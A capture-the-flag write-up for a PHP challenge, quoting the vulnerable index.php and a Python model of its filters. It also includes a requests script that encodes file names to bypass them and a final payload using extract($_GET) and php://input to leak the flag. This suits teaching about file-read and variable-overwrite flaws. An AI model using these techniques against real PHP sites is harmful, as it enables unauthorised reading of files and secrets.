I had heard this challenge has a few traps, and they are nasty ones.
Intercept the request and add admin to get the source code:
<?php
/*
* url
* Date: July 4,2018
*/
// Note: "||" is a logical OR, so this line actually sets error_reporting(1); left exactly as in the challenge source
error_reporting(E_ALL || ~E_NOTICE);
header('content-type:text/html;charset=utf-8');
if(! isset($_GET['jpg']))
    header('Refresh:0;url=./index.php?jpg=TmpZMlF6WXhOamN5UlRaQk56QTJOdz09');
// The file name arrives hex-encoded and then base64-encoded twice
$file = hex2bin(base64_decode(base64_decode($_GET['jpg'])));
// User input is reflected into the page without escaping
echo '<title>'.$_GET['jpg'].'</title>';
// Keep only letters, digits and dots: "/" and "!" are stripped here
$file = preg_replace("/[^a-zA-Z0-9.]+/","", $file);
echo $file.'</br>';
// Then every "config" becomes "!"
$file = str_replace("config","!", $file);
echo $file.'</br>';
// Whatever survived the two filters is read from disk and embedded as an image
$txt = base64_encode(file_get_contents($file));
echo "<img src='data:image/gif;base64,".$txt."'></img>";
/*
* Can you find the flag file?
*
*/
?>
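To see exactly which file names can reach file_get_contents() through the two filters above, here is an added Python model of the decode chain and of both filters (this is example code written for this writeup, not the challenge's or the author's code; the function names decode_jpg_param, encode_jpg_param, apply_filters, resolved_target and safe_image_path are my own, and safe_image_path is an assumed hardened design, not something the challenge provides). It decodes the default jpg value the page redirects to, shows what a traversal attempt and the "config" trick turn into, and contrasts the character-stripping approach with a realpath-plus-allowlist check:

```python
import base64
import binascii
import os
import re
from typing import Optional

# Constructed sample: the default jpg value index.php redirects to
DEFAULT_JPG = "TmpZMlF6WXhOamN5UlRaQk56QTJOdz09"


def decode_jpg_param(jpg: str) -> str:
    """Replicate hex2bin(base64_decode(base64_decode($_GET['jpg'])))."""
    inner = base64.b64decode(base64.b64decode(jpg))
    return binascii.unhexlify(inner).decode("latin-1")


def encode_jpg_param(name: str) -> str:
    """Inverse of decode_jpg_param: the value a client has to send for `name`."""
    hex_name = binascii.hexlify(name.encode("latin-1"))
    return base64.b64encode(base64.b64encode(hex_name)).decode("ascii")


def apply_filters(path: str) -> str:
    """Replicate the two filters of index.php, in order:
    preg_replace("/[^a-zA-Z0-9.]+/", "", $file) and then
    str_replace("config", "!", $file).
    """
    stripped = re.sub(r"[^a-zA-Z0-9.]+", "", path)
    return stripped.replace("config", "!")


def resolved_target(jpg: str) -> str:
    """The string file_get_contents() is finally called with for a jpg value."""
    return apply_filters(decode_jpg_param(jpg))


def safe_image_path(name: str, image_dir: str,
                    allowed_ext=(".jpg", ".gif", ".png")) -> Optional[str]:
    """Assumed hardened counterpart (not the challenge code): resolve the
    request against one fixed directory, refuse anything that escapes it,
    and only serve allow-listed extensions. Returns None when refused."""
    base = os.path.realpath(image_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    # The resolved path must stay inside image_dir (realpath also defeats symlinks)
    if os.path.commonpath([base, candidate]) != base:
        return None
    if os.path.splitext(candidate)[1].lower() not in allowed_ext:
        return None
    return candidate


if __name__ == "__main__":
    print(resolved_target(DEFAULT_JPG))                               # flag.jpg
    print(resolved_target(encode_jpg_param("../../etc/passwd")))      # ....etcpasswd
    print(resolved_target(encode_jpg_param("f1agconfigddctf.php")))   # f1ag!ddctf.php
    print(safe_image_path("../../etc/passwd", "images"))              # None
```

The model makes the weakness of the original filter visible: stripping "/" does neutralise directory traversal, but any alphanumeric file name in the web root, an editor swap file included, still reaches file_get_contents(), and the "config" to "!" substitution is reversible by the client. Pinning the lookup to one directory with a realpath check and an extension allowlist closes both holes without relying on character stripping.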
The trap in this challenge is practice.txt.swp.
Write a simple script to build the requests instead of doing it in the browser:
import base64
import binascii
import requests

def encode2(str1):
    # Reverse the server's decode chain: hex first, then base64 twice
    hex_name = binascii.hexlify(str1.encode())
    return base64.b64encode(base64.b64encode(hex_name)).decode()

def get1(str1):
    url = 'http://url/index.php?jpg=' + encode2(str1)
    print(str1, url)
    req = requests.get(url)
    print(req.text)

get1('practice.txt.swp')
get1('f1agconfigddctf.php')
This gives the string ZjFhZyFkZGN0Zi5waHA=.
Base64-decoding it yields f1ag!ddctf.php.
The ! cannot be sent directly, because preg_replace strips it, but str_replace turns config into !, so the name to request is
f1agconfigddctf.php
which the server rewrites to f1ag!ddctf.php and reads for us:
<?php
include('config.php');
$k = 'hello';
// extract() turns every GET parameter into a local variable, so $k can be overwritten by the request
extract($_GET);
if(isset($uid))
{
    $content=trim(file_get_contents($k));
    // Loose comparison between the supplied uid and the file contents
    if($uid==$content)
    {
        echo $flag;
    }
    else
    {
        echo'hello';
    }
}
?>
There is a bypass here: extract($_GET) lets the request overwrite $k, and $k is passed straight to file_get_contents, so a php:// stream wrapper can be used. With k=php://input the server reads the raw request body, which is empty for a plain GET, and trim('') == '' matches an empty uid, so $flag is printed.
The final payload:
http://url/f1ag!ddctf.php?uid=&k=php://input